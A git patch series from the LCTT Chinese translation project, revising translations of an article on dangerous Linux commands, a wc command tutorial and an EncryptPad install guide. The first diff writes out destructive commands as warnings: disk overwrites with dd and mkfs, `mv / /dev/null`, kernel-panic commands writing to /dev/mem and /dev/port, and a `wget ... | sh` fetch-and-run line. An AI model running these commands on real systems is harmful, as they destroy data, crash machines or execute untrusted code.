-在另一方面,它和 `dd if=/dev/random of=/dev/hda` 近源,除了能毁掉你的一天之外,它并不友善。如果你运行了这个指令(千万不要),你的存储器会被随机数据覆盖。为了隐藏去接管办公室咖啡机的秘密计划,不错,这是一个粗糙的方法,但是你可以使用 DBAN 工具去更好得完成你的任务。
+在另一方面,它和 `dd if=/dev/random of=/dev/hda` 相近,除了能毁掉你的一天之外,不是一个好事。如果你运行了这个指令(千万不要),你的存储器会被随机数据覆盖。作为一个隐藏你要接管办公室咖啡机的秘密计划的半吊子方法,倒是不错,但是你可以使用 DBAN 工具去更好的完成你的任务。
### /dev/null 的损失
-也许因为数据珍贵,我们对备份的数据没有什么信心,确实很多“永远不要这样做!”的命令都会导致硬盘存储仓库数据被擦除。一个鲜明的实例:另一个毁灭你的存储设备的方式,运行‘mv / /dev/null’或者‘>mv ’。
+也许因为数据珍贵,我们对备份的数据没有什么信心,确实很多“永远不要这样做!”的命令都会导致硬盘或其它存储仓库的数据被擦除。一个鲜明的实例:另一个毁灭你的存储设备的方式,运行 `mv / /dev/null` 或者 `>mv /dev/null`。
-在前一种情况下,你作为 root 用户,把整个磁盘数据都送进这个如饥似渴的目录 ‘/dev/null’。在后者,你仅仅把家目录喂给这个空空如也的目录,‘/dev/null’。任何一种情况下,除非备份还原,你再也不会再看见你的数据了。
+在前一种情况下,你作为 root 用户,把整个磁盘数据都送进这个如饥似渴的 `/dev/null`。在后者,你仅仅把家目录喂给这个空空如也的仓库。任何一种情况下,除非还原备份,你再也不会再看见你的数据了。
-451个研究报告指出,当提到容器的时候,都不要忽略数据持久和数据存储。
-
-[Get the report][9]
-
-见鬼,难道会计无论如何都真的不需要最新的应收账款文件吗?
+见鬼,难道会计真的不需要最新的应收账款文件了吗?
### 格式化错了驱动器
-有时候你必须使用这一条命令格式化驱动器:
+有时候你需要使用这一条命令格式化驱动器:
+
```
mkfs.ext3 /dev/hda
```
-…它在格式化 ext3 文件系统的主硬盘驱动器。别,请等一分钟!你正在格式化你的主驱!难道你不需要用它?
+……它会用 ext3 文件系统格式化主硬盘驱动器。别,请等一下!你正在格式化你的主驱动器!难道你不需要用它?
-当你要格式化驱动器的时候,请务必加倍确认你正在格式化的分区是真的需要格式化的那块还是你正在使用的那块,它们是是固态,闪存还是其他氧化铁。
+当你要格式化驱动器的时候,请务必加倍确认你正在格式化的分区是真的需要格式化的那块而不是你正在使用的那块,无论它们是 SSD、闪存盘还是其他氧化铁磁盘。
### 内核崩溃
-一些 Linux 命令不能让你的机器长时间计算。然而,一些命令却可以导致内核崩溃。这些错误通常是由硬件问题引起的,你可以自己解决。
+一些 Linux 命令不能让你的机器长时间停机。然而,一些命令却可以导致内核崩溃。这些错误通常是由硬件问题引起的,但你也可以自己搞崩。
-当你遭遇内核崩溃,重新启动系统你才可以恢复工作。在一些情况下,这会有点小烦;在另一些情况下,这是一个大问题,比如说,高负荷运作下的生产环境。下面有一个案例:
+当你遭遇内核崩溃,重新启动系统你才可以恢复工作。在一些情况下,这只是有点小烦;在另一些情况下,这是一个大问题,比如说,高负荷运作下的生产环境。下面有一个案例:
```
dd if=/dev/random of=/dev/port
-
- echo 1 > /proc/sys/kernel/panic
-
- cat /dev/port
-
- cat /dev/zero > /dev/mem
+echo 1 > /proc/sys/kernel/panic
+cat /dev/port
+cat /dev/zero > /dev/mem
```
+
这些都会导致内核崩溃。
-不要运行你并不了解它功能的命令,它们都在提醒我…
+绝不要运行你并不了解它功能的命令,它们都在提醒我…
### 提防未知脚本
-年轻或是懒惰的系统管理员喜欢复制别人的脚本。何必重新重复造轮子?这样,它们找到了一个很酷的脚本,并且承诺会自动检查所有备份。它们匆匆得拿走了这样一个命令:
+年轻或是懒惰的系统管理员喜欢复制别人的脚本。何必重新重复造轮子?所以,他们找到了一个很酷的脚本,承诺会自动检查所有备份。他们就这样运行它:
+
```
wget https://ImSureThisIsASafe/GreatScript.sh -O- | sh
```
-这个下载脚本将输出到 shell 上运行。很明确,别大惊小怪,对吧?不对。这个脚本可能已经被这个恶意软件毒害。当然,一般来说 Linux 比大多数操作系统都要安全,但是如果你把位置代码运行在 root 用户上,什么可能会发生。这个危害不仅在恶意软件上,脚本作者的愚蠢本身同样有害。你甚至可能会因为一个未调试的代码吃上一堑--由于你没有花时间去读它。
-你认为你不会干那样的事?告诉我,所有会有这些事情发生 [container images you're running on Docker][10]?你直到它们到底在运行着什么吗?我见过太多都未验证容器里面装着什么就运行它们的系统管理员。请不要和他们一样。
+这会下载该脚本,并将它送到 shell 上运行。很明确,别大惊小怪,对吧?不对。这个脚本也许已经被恶意软件感染。当然,一般来说 Linux 比大多数操作系统都要安全,但是如果你以 root 用户运行未知代码,什么都可能会发生。这种危害不仅在恶意软件上,脚本作者的愚蠢本身同样有害。你甚至可能会因为一个未调试的代码吃上一堑——由于你没有花时间去读它。
+
+你认为你不会干那样的事?告诉我,所有那些 [你在 Docker 里面运行的容器镜像在干什么][10]?你知道它们到底在运行着什么吗?我见过太多的没有验证容器里面装着什么就运行它们的系统管理员。请不要和他们一样。
### 结束
-这些故事背后的道理很简单。在你的 Linux 系统里,你有巨大的控制权。你几乎可以让你的服务器做任何事。在你使用你的权限的同时,请务必做认真的确认。如果你没有,你毁灭的不是你的服务器,而是你的工作甚至是你的公司。像蜘蛛侠一样负责任的使用你的权限。
+这些故事背后的道理很简单。在你的 Linux 系统里,你有巨大的控制权。你几乎可以让你的服务器做任何事。但是在你使用你的权限的同时,请务必做认真的确认。如果你没有,你毁灭的不只是你的服务器,而是你的工作甚至是你的公司。像蜘蛛侠一样,负责任的使用你的权限。
-我有没有遗漏什么?在 [@sjvn][11] 或 [@enterprisenxt][12] 上告诉我那些 Linux命令在你的“[Never use this!][13]”的清单上。
+我有没有遗漏什么?在 [@sjvn][11] 或 [@enterprisenxt][12] 上告诉我哪些 Linux 命令在你的“[绝不要运行!][13]”的清单上。
--------------------------------------------------------------------------------
via: https://www.hpe.com/us/en/insights/articles/the-linux-commands-you-should-never-use-1712.html
作者:[Steven Vaughan-Nichols][a]
-译者:[译者ID](https://github.com/CYLeft)
-校对:[校对者ID](https://github.com/校对者ID)
+译者:[CYLeft](https://github.com/CYLeft)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
@@ -170,7 +168,7 @@ via: https://www.hpe.com/us/en/insights/articles/the-linux-commands-you-should-n
[1]:http://www.zdnet.com/article/equifax-blames-open-source-software-for-its-record-breaking-security-breach/
[2]:https://www.hpe.com/us/en/insights/articles/16-linux-server-monitoring-commands-you-really-need-to-know-1703.html
[3]:https://www.reddit.com/r/sysadmin/comments/732skq/after_21_years_i_finally_made_the_rm_boo_boo/
-[4]:https://www.cyberciti.biz/faq/understanding-bash-fork-bomb/
+[4]:https://linux.cn/article-5685-1.html
[5]:https://unix.stackexchange.com/questions/283496/why-do-these-bash-fork-bombs-work-differently-and-what-is-the-significance-of
[6]:https://dban.org/
[7]:https://www.hpe.com/us/en/insights/articles/13-ways-to-tank-your-it-career-1707.html
From 86c747f395aef10f2b05c37035a592051bc445ce Mon Sep 17 00:00:00 2001
From: wxy
Date: Fri, 5 Jan 2018 23:32:11 +0800
Subject: [PATCH 031/371] PUB:20171219 The Linux commands you should NEVER
use.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@CYLeft 恭喜你,完成了第一篇翻译,本文发表地址:https://linux.cn/article-9206-1.html
你的 LCTT 专页地址: https://linux.cn/lctt/CYLeft
---
.../20171219 The Linux commands you should NEVER use.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20171219 The Linux commands you should NEVER use.md (100%)
diff --git a/translated/tech/20171219 The Linux commands you should NEVER use.md b/published/20171219 The Linux commands you should NEVER use.md
similarity index 100%
rename from translated/tech/20171219 The Linux commands you should NEVER use.md
rename to published/20171219 The Linux commands you should NEVER use.md
From 46fc1a96d67a26e33afd6e53f6ea4f0038624736 Mon Sep 17 00:00:00 2001
From: stevenzdg988
Date: Sat, 6 Jan 2018 00:05:53 +0800
Subject: [PATCH 032/371] Translated by stevenzdg988
---
...nd Explained for Beginners (6 Examples).md | 129 ------------------
...nd Explained for Beginners (6 Examples).md | 119 +++++++---------
2 files changed, 47 insertions(+), 201 deletions(-)
delete mode 100644 sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
diff --git a/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md b/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
deleted file mode 100644
index 2d46a74207..0000000000
--- a/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
+++ /dev/null
@@ -1,129 +0,0 @@
-translating by stevenzdg988
-
-Linux wc Command Explained for Beginners (6 Examples)
-======
-
-While working on the command line, sometimes you may want to access the number of words, byte counts, or even newlines in a file. If you are looking for a tool to do this, you'll be glad to know that in Linux, there exists a command line utility - dubbed **wc** \- that does all this for you. In this article, we will be discussing this tool through easy to understand examples.
-
-But before we jump in, it's worth mentioning that all examples provided in this tutorial have been tested on Ubuntu 16.04.
-
-### Linux wc command
-
-The wc command prints newline, word, and byte counts for each input file. Following is the syntax of this command line tool:
-
-wc [OPTION]... [FILE]...
-
-And here's how wc's man page explains it:
-```
-Print newline, word, and byte counts for each FILE, and a total line if more than one FILE is
-specified. A word is a non-zero-length sequence of characters delimited by white space. With no
-FILE, or when FILE is -, read standard input.
-```
-
-The following Q&A-styled examples will give you an even better idea about the basic usage of wc.
-
-Note: We'll be using a file named file.txt as the input file in all our examples. Following is what the file contains:
-```
-hi
-hello
-how are you
-thanks.
-```
-
-### Q1. How to print the byte count
-
-Use the **-c** command line option to print the byte count.
-
-wc -c file.txt
-
-Here's the output this command produced on our system:
-
-[![How to print the byte count][1]][2]
-
-So the file contains 29 bytes.
-
-### Q2. How to print the character count
-
-To print the number of characters, use the **-m** command line option.
-
-wc -m file.txt
-
-Here's the output this command produced on our system:
-
-[![How to print the character count][3]][4]
-
-So the file contains 29 characters.
-
-### Q3. How to print the newline count
-
-Use the **-l** command line option to print the number of newlines in the file.
-
-wc -l file.txt
-
-Here's the output in our case:
-
-[![How to print the newline count][5]][6]
-
-### Q4. How to print the word count
-
-To print the number of words present in the file, use the **-w** command line option.
-
-wc -w file.txt
-
-Following the output the command produced in our case:
-
-[![How to print the word count][7]][8]
-
-So this reveals there are 6 words in the file.
-
-### Q5. How to print the maximum display width or length of longest line
-
-In case you want to print the length of the longest line in the input file, use the **-L** command line option.
-
-wc -L file.txt
-
-Here's the output the command produced in our case:
-
-[![How to print the maximum display width or length of longest line][9]][10]
-
-So the length of the longest file in our file is 11.
-
-### Q6. How to read input file name(s) from a file
-
-In case you have multiple file names, and you want wc to read them from a file, then use the **\--files0-from** option.
-
-wc --files0-from=names.txt
-
-[![How to read input file name\(s\) from a file][11]][12]
-
-So you can see that the wc command, in this case, produced lines, words, and characters count for file.txt in the output. The name file.txt was mentioned in the names.txt file. It's worth mentioning that to successfully use this option, names written the file should be NUL terminated - you can generate this character by typing Ctrl+v followed by Ctrl+Shift+@.
-
-### Conclusion
-
-As you'd agree, wc is a simple command, both from understanding and usage purposes. We've covered pretty much all command line options the tool offers, so you should be ready to use the tool on a daily basis once you practice whatever we've explained here. For more info on wc, head to its [man page][13].
-
-
---------------------------------------------------------------------------------
-
-via: https://www.howtoforge.com/linux-wc-command-explained-for-beginners-6-examples/
-
-作者:[Himanshu Arora][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.howtoforge.com
-[1]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/wc-c-option.png
-[2]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/wc-c-option.png
-[3]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/wc-m-option.png
-[4]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/wc-m-option.png
-[5]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/wc-l-option.png
-[6]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/wc-l-option.png
-[7]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/wc-w-option.png
-[8]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/wc-w-option.png
-[9]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/wc-L-option.png
-[10]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/wc-L-option.png
-[11]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/wc-file0-from-option.png
-[12]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/wc-file0-from-option.png
-[13]:https://linux.die.net/man/1/wc
diff --git a/translated/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md b/translated/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
index 2b2bb0d935..dd2eef1f50 100644
--- a/translated/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
+++ b/translated/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
@@ -1,26 +1,23 @@
-Linux wc 命令入门
+为 Linux 初学者讲解 WC 命令(6个例子)
======
-有些时候,我们需要在命令行环境下获取一个文件的单词数量,字节数甚至行数。Linux 自带了一个命令行工具 **wc** 可以完成这些功能。下面举几个例子。
+在命令行工作时,有时您可能想要访问一个文件中的单词数量、字节数、甚至换行数。如果您正在寻找这样做的工具,您会很高兴地知道,在 Linux 中,存在一个命令行实用程序,它被称为 -dubbed **wc** \-,它为您完成所有这些工作。在本文中,我们将通过简单易懂的例子来讨论这个工具。
+但是在我们开始之前,值得一提的是,本教程中提供的所有示例都在 Ubuntu 16.04上进行了测试。
+### Linux WC 命令
-请注意,以下例子的运行环境是 Ubuntu 16.04。
+WC 命令打印每个输入文件的新行、字和字节数。以下是该命令行工具的语法:
+```wc [OPTION]... [FILE]...```
-### Linux wc 命令
-
-wc 命令会打印文件的行数,单词数和字节数。以下是这个命令的使用方法:
-
-wc [OPTION]... [FILE]...
-
-wc 的 man 页面的描述:
+以下是 WC 人工文档的解释:
```
Print newline, word, and byte counts for each FILE, and a total line if more than one FILE is
specified. A word is a non-zero-length sequence of characters delimited by white space. With no
FILE, or when FILE is -, read standard input.
+为每个文件打印新行、单词和字节数,如果多于一个文件,则为总行指定。单词是由空格分隔的非零长度的字符序列。没有文件,或当文件为-,读取标准输入。
```
-下面举 6 个例子,看看 wc 命令的基本使用方法。
-
-**注意**:例子中使用的 file.txt 是输入文件。这个文件的内容是:
+下面的 Q&A 样式的示例将会让您更好地了解 WC 命令的基本用法。
+注意:在所有示例中我们将使用一个名为 ```file.txt``` 的文件作为输入文件。以下是该文件包含的内容:
```
hi
hello
@@ -28,100 +25,78 @@ how are you
thanks.
```
-### Q1. 如何打印文件的字节数
+### Q1. 如何打印字节数
-使用 **-c** 参数打印字节数。
+使用 **-c** 命令选项打印字节数.
-```
-wc -c file.txt
-```
+**wc -c file.txt**
-这个命令会输出:
+下面是这个命令在我们的系统上产生的输出:
-[![How to print the byte count][1]][2]
+[![如何打印字节数][1]][2]
-这个文件包含 29 个字节。
+文件包含29个字节。
-### Q2. 如何打印文件的字符数
+### Q2. 如何打印字符数
-使用 **-m** 参数打印字符数。
+要打印字符数,请使用 **-m** 命令行选项。
+**wc -m file.txt**
-```
-wc -m file.txt
-```
+下面是这个命令在我们的系统上产生的输出:
-这个命令会输出:
+[![如何打印字符数][3]][4]
-[![How to print the character count][3]][4]
+文件包含29个字符。
-这个文件包含 29 个字符。
+### Q3. 如何打印换行数
-### Q3. 如何打印文件的行数
+使用 **-l**命令选项来打印文件中的新行数。
-使用 **-l** 参数打印字符数。
+**wc -l file.txt**
-```
-wc -l file.txt
-```
+这里是我们的例子的输出:
-这个命令会输出:
+[![如何打印换行数][5]][6]
-[![How to print the newline count][5]][6]
+### Q4. 如何打印字数
-这个文件包含 4 行。
+要打印文件中的单词数量,请使用 **-w**命令选项。
-### Q4. 如何打印文件的单词数
+**wc -w file.txt**
-使用 **-w** 参数打印单词数。
+在我们的例子中命令的输出如下:
+[![如何打印字数][7]][8]
-```
-wc -w file.txt
-```
+这显示文件中有6个单词。
-这个命令会输出:
+### Q5. 如何打印最长行的显示宽度或长度
-[![How to print the word count][7]][8]
+如果您想要打印输入文件中最长行的长度,请使用**-l**命令行选项。
-所以,这个文件包含 6 个单词。
+**wc -L file.txt**
-### Q5. 如何打印最长的行的的长度
+下面是在我们的案例中命令产生的结果:
+[![如何打印最长行的显示宽度或长度][9]][10]
-使用 **-L** 参数打印打印最长的行的的长度。
+所以文件中最长的行长度是11。
+### Q6. 如何从文件读取输入文件名
-```
-wc -L file.txt
-```
+如果您有多个文件名,并且您希望 WC 从一个文件中读取它们,那么使用**\-files0-from**选项。
+**wc --files0-from=names.txt**
-这个命令会输出:
+[![如何从文件读取输入文件名][11]][12]
-[![How to print the maximum display width or length of longest line][9]][10]
-
-所以,这个文件最长的行的长度是 11。
-
-### Q6. 如何使用一个文件的内容作为命令的输入
-
-如果你有一个存放多个文件名的文件,你可以使用 **\--files0-from** 参数从该文件一次读取所有文件。
-
-```
-wc --files0-from=names.txt
-```
-
-这个命令会输出:
-
-[![How to read input file name\(s\) from a file][11]][12]
-
-在这个例子中, wc 命令打印 file.txt 文件的行数,单词书和字符数。需要注意的是 names.txt 文件的每一行都要使用 NUL 字符作为结尾。你可以使用 Ctrl+v 然后 Ctrl+Shift+@ 输入 NUL 字符。
-
-### 总结
-wc 是一个简单易用的命令。上述几个例子简要地说明了这个命令的使用方法,方便我们在日常参考使用。更多 wc 的说明,请参考 [man page][13]。
+因此,您可以看到 WC 命令,在示例中,文件 **file.txt**输出了行、单词和字符数三种输出模式。文件名为 **file.txt**的文件在**name.txt**文件中提及。值得一提的是,为了成功地使用这个选项,写入文件的名称应该用 NUL 终止——您可以通过键入**Ctrl + v**然后按**Ctrl +Shift+ @**来生成这个字符。
+### 结论
+正如您所认同的一样,从理解和使用目的来看, WC 是一个简单的命令。我们已经介绍了几乎所有的命令行选项,所以您应该随时准备使用工具,在实践过程中以我们在这里解释过的内容为基础。想了解更多关于 WC 的信息,请参考它的[人工文档][13]。
--------------------------------------------------------------------------------
via: https://www.howtoforge.com/linux-wc-command-explained-for-beginners-6-examples/
作者:[Himanshu Arora][a]
-译者:[译者ID](https://github.com/cyleung)
+译者:[stevenzdg988](https://github.com/stevenzdg988)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From dfc76acf8aa495a3b227c41917f6d5ead12e818e Mon Sep 17 00:00:00 2001
From: Ocputs <15391606236@163.com>
Date: Sat, 6 Jan 2018 00:14:11 +0800
Subject: [PATCH 033/371] EncryptPad compelete
---
...ile Encryption And Decryption CLI Utility.md | 2 +
...tall and Use Encryptpad on Ubuntu 16.04.md | 123 ------------------
...tall and use encryptpad on ubuntu 16.04.md | 108 +++++++++++++++
3 files changed, 110 insertions(+), 123 deletions(-)
delete mode 100644 sources/tech/20171214 How to Install and Use Encryptpad on Ubuntu 16.04.md
create mode 100644 translated/tech/How to install and use encryptpad on ubuntu 16.04.md
diff --git a/sources/tech/20171212 Toplip – A Very Strong File Encryption And Decryption CLI Utility.md b/sources/tech/20171212 Toplip – A Very Strong File Encryption And Decryption CLI Utility.md
index ad3528f60b..1b4ed51305 100644
--- a/sources/tech/20171212 Toplip – A Very Strong File Encryption And Decryption CLI Utility.md
+++ b/sources/tech/20171212 Toplip – A Very Strong File Encryption And Decryption CLI Utility.md
@@ -1,3 +1,5 @@
+Translateing by singledo
+
Toplip – A Very Strong File Encryption And Decryption CLI Utility
======
There are numerous file encryption tools available on the market to protect
diff --git a/sources/tech/20171214 How to Install and Use Encryptpad on Ubuntu 16.04.md b/sources/tech/20171214 How to Install and Use Encryptpad on Ubuntu 16.04.md
deleted file mode 100644
index f5a42780b5..0000000000
--- a/sources/tech/20171214 How to Install and Use Encryptpad on Ubuntu 16.04.md
+++ /dev/null
@@ -1,123 +0,0 @@
-translateing by singledo
-
-How to Install and Use Encryptpad on Ubuntu 16.04
-======
-
-EncryptPad is a free and open source software application that can be used for viewing and editing encrypted text using a simple and convenient graphical and command line interface. It uses OpenPGP RFC 4880 file format. You can easily encrypt and decrypt file using EncryptPad. Using EncryptPad, you can save your private information like, password, credit card information and access the file using a password or key files.
-
-#### Features
-
- * Supports Windows, Linux and Mac OS
- * Customisable passphrase generator helps create strong random passphrases.
- * Random key file and password generator.
- * Supports GPG and EPD file formats.
- * You can download key automatically from remote storage using CURL.
- * Path to a key file can be stored in an encrypted file. If enabled, you do not need to specify the key file every time you open files.
- * Provide read only mode to prevent file modification.
- * Encrypt binary files such as, images, videos, archives.
-
-
-
-In this tutorial, we will learn how to install and use the software EncryptPad on Ubuntu 16.04.
-
-### Requirements
-
- * Ubuntu 16.04 desktop version installed on your system.
- * A normal user with sudo privileges setup on your system.
-
-
-
-### Install EncryptPad
-
-By default, EncryptPad is not available in Ubuntu 16.04 default repository. So you will need to install an additional repository for EncryptPad first. You can add it with the following command:
-
-sudo apt-add-repository ppa:nilarimogard/webupd8
-
-Next, update the repository using the following command:
-
-sudo apt-get update -y
-
-Finally, install EncryptPad by running the following command:
-
-sudo apt-get install encryptpad encryptcli -y
-
-Once the installation is completed, you should locate it under Ubuntu dashboard.
-
-### Access EncryptPad and Generate Key and Passphrase
-
-Now, go to the **Ubuntu Dash** and type **encryptpad** , you should see the following screen:
-
-[![Ubuntu Desktop][1]][2]
-
-Next, click on the **EncryptPad** icon, you should see the first screen of the EncryptPad in following screen. It is a simple text editor and has a menu bar on the top.
-
-[![EncryptPad][3]][4]
-
-First, you will need to generate a key and passphrase for future encryption/decryption tasks. To do so, click on **Encryption > Generate Key** option from the top menu, you should see the following screen:
-
-[![Generate Key][5]][6]
-
-Here, select the path where you want to save the file and click on the **Ok** button, you should see the following screen:
-
-[![Passphrase for key file][7]][8]
-
-Now, enter passphrase for the key file and click on the **Ok** button, you should see the following screen:
-
-[![Use generated key for this file][9]][10]
-
-Now, click on the yes button to finish the process.
-
-### Encrypt and Decrypt File
-
-Now, the key file and passphrase are generated, it's time to perform encryption and decryption operation. To do so, open any text file in this editor and click on the **encryption** icon, you should see the following screen:
-
-[![Encrypt or Decrypt file][11]][12]
-
-Here, provide input file which you want to encrypt and specify the output file, provide passphrase and the path of the key file which we have generated earlier, then click on the Start button to start the process. Once the file has been encrypted successfully, you should see the following screen:
-
-[![File encrypted successfully][13]][14]
-
-Your file is now encrypted with key and passphrase.
-
-If you want to decrypt this file, open **EncryptPad** , click on **File Encryption** , choose **Decryptio** option, provide the path of your encrypted file and path of the output file where you want to save the decrypted file, then provide path of the key file and click on the Start button, it will ask you for passphrase, enter your passphrase and click on Ok button to start the Decryption process. Once the process is completed successfully, you should see the "File has been decrypted successfully message".
-
-[![File encryption settings][15]][16]
-
-[![Passphrase][17]][18]
-
-[![File has been encrypted][19]][20]
-
-**Note:** If you forgot your passphrase or lost a key file, there is no way that can be done to open your encrypted information. There are no backdoors in the formats that EncryptPad supports.
-
-
---------------------------------------------------------------------------------
-
-via: https://www.howtoforge.com/tutorial/how-to-install-and-use-encryptpad-on-ubuntu-1604/
-
-作者:[Hitesh Jethva][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.howtoforge.com
-[1]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-dash.png
-[2]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-dash.png
-[3]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-dashboard.png
-[4]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-dashboard.png
-[5]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-generate-key.png
-[6]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-generate-key.png
-[7]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-generate-passphrase.png
-[8]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-generate-passphrase.png
-[9]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-use-key-file.png
-[10]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-use-key-file.png
-[11]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-start-encryption.png
-[12]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-start-encryption.png
-[13]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-file-encrypted-successfully.png
-[14]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-file-encrypted-successfully.png
-[15]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-decryption-page.png
-[16]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-decryption-page.png
-[17]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-decryption-passphrase.png
-[18]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-decryption-passphrase.png
-[19]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-decryption-successfully.png
-[20]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-decryption-successfully.png
diff --git a/translated/tech/How to install and use encryptpad on ubuntu 16.04.md b/translated/tech/How to install and use encryptpad on ubuntu 16.04.md
new file mode 100644
index 0000000000..83e8f78645
--- /dev/null
+++ b/translated/tech/How to install and use encryptpad on ubuntu 16.04.md
@@ -0,0 +1,108 @@
+# How To Install and Use Encryptpad on Ubuntu 16.04
+```
+EncryptPad 是一个免费的开源软件 ,它通过简单的图片转换和命令行接口来查看和修改加密的文件文件 ,它使用 OpenPGP RFC 4880 文件格式 。通过 EncryptPad ,你可以很容易的加密或者解密文件 。你能够像保存密码 ,信用卡信息 ,密码或者密钥文件这类的私人信息 。
+```
+## 特性
+- 支持 windows ,Linux ,和 Max OS 。
+- 可定制的密码生成器 ,足够健壮的密码 。
+- 随机密钥文件和密码生成器 。
+- 至此 GPG 和 EPD 文件格式 。
+- 通过 CURL 自动从远程远程仓库下载密钥 。
+- 密钥文件能够存储在加密文件中 。如果生效 ,你不需要每次打开文件都指定密钥文件 。
+- 提供只读模式来保护文件不被修改 。
+- 可加密二进制文件 。例如 图片 ,视屏 ,档案 。
+
+```
+在这份引导说明中 ,我们将学习如何在 Ubuntu 16.04 中安装和使用 EncryptPad 。
+```
+## 环境要求
+- 在系统上安装了 Ubuntu 16.04 桌面版本 。
+- 用户在系统上有 sudo 的权限 。
+
+## 安装 EncryptPad
+在默认情况下 ,EncryPad 在 Ubuntu 16.04 的默认仓库是不存在的 。你需要安装一个额外的仓库 。你能够通过下面的命令来添加它 :
+- **sudo apt-add-repository ppa:nilaimogard/webupd8**
+
+ 下一步 ,用下面的命令来更新仓库 :
+- **sudo apt-get update -y**
+
+ 最后一步 ,通过下面命令安装 EncryptPAd :
+- **sudo apt-get install encryptpad encryptcli -y**
+
+当 EncryptPad 安装完成 ,你需要将它固定到 Ubuntu 的仪表板上 。
+
+## 使用 EncryptPad 生成密钥和密码
+```
+现在 ,去 Ubunntu Dash 上输入 encryptpad ,你能够在你的屏幕上看到下面的图片 :
+```
+[![Ubuntu DeskTop][1]][2]
+
+```
+下一步 ,点击 EncryptPad 的图标 。你能够看到 EncryptPad 的界面 ,有一个简单的文本编辑器以及顶部菜单栏 。
+```
+[![EncryptPad screen][3]][4]
+
+```
+首先 ,你需要产生一个密钥和密码来给将来加密/解密任务使用 。点击顶部菜单栏中的 Encryption->Generate Key ,你会看见下面的界面 :
+```
+[![Generate key][5]][6]
+```
+选择文件保存的路径 ,点击 OK 按钮 ,你将看到下面的界面 。
+```
+[![select path][7]][8]
+```
+输入密钥文件的密码 ,点击 OK 按钮 ,你将看到下面的界面 :
+```
+[![last step][9]][10]
+```
+点击 yes 按钮来完成进程 。
+```
+## 加密和解密文件
+```
+现在 ,密钥文件和密码都已经生成了 。现在可以执行加密和解密操作了 。在这个文件编辑器中打开一个文件文件 ,点击加密图标 ,你会看见下面的界面 :
+```
+[![Encry operation][11]][12]
+```
+提供需要加密的文件和指定输出的文件 ,提供密码和前面产生的密钥文件 。点击 Start 按钮来开始加密的进程 。当文件被成功的加密 ,会出现下面的界面 :
+````
